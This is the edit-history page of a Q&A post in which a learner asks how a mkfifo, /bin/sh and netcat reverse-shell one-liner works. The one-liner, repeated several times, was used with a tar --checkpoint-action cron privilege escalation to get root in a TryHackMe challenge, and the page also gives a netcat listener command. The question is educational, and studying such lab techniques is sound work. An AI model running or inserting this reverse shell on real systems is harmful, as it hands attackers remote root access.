Post History
This blog post describes a privilege escalation, exploiting tar's --checkpoint-action option. The privilege escalation is used to solve a TryHackMe challenge. The root user calls tar via cron whi...
#2: Post edited
by
Matthias Braun
·
2021-08-31T19:20:08Z (over 2 years ago)
fix post
[This blog post] describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a [TryHackMe](https://www.tryhackme.com/) challenge.- The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):
- rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
- I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.
- Here's my literal reading of the command:
- 1. Create a new named pipe at `/tmp/f`.
- 2. Write the contents of `/tmp/f` to an interactive shell.
- 3. Write the output of the shell to netcat.
- 4. The output of netcat is written to the named pipe `/tmp/f`.
- After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.
- I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
- [This blog post](https://blog.gregscharf.com/2021/03/22/tar-in-cronjob-to-privilege-escalation/) describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a [TryHackMe](https://www.tryhackme.com/) challenge.
- The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):
- rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
- I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.
- Here's my literal reading of the command:
- 1. Create a new named pipe at `/tmp/f`.
- 2. Write the contents of `/tmp/f` to an interactive shell.
- 3. Write the output of the shell to netcat.
- 4. The output of netcat is written to the named pipe `/tmp/f`.
- After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.
- I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
#1: Initial revision
by
Matthias Braun
·
2021-08-31T19:19:30Z (over 2 years ago)
Reverse shell with named pipe and netcat
[This blog post] describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a [TryHackMe](https://www.tryhackme.com/) challenge.
The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.
Here's my literal reading of the command:
1. Create a new named pipe at `/tmp/f`.
2. Write the contents of `/tmp/f` to an interactive shell.
3. Write the output of the shell to netcat.
4. The output of netcat is written to the named pipe `/tmp/f`.
After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.
I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.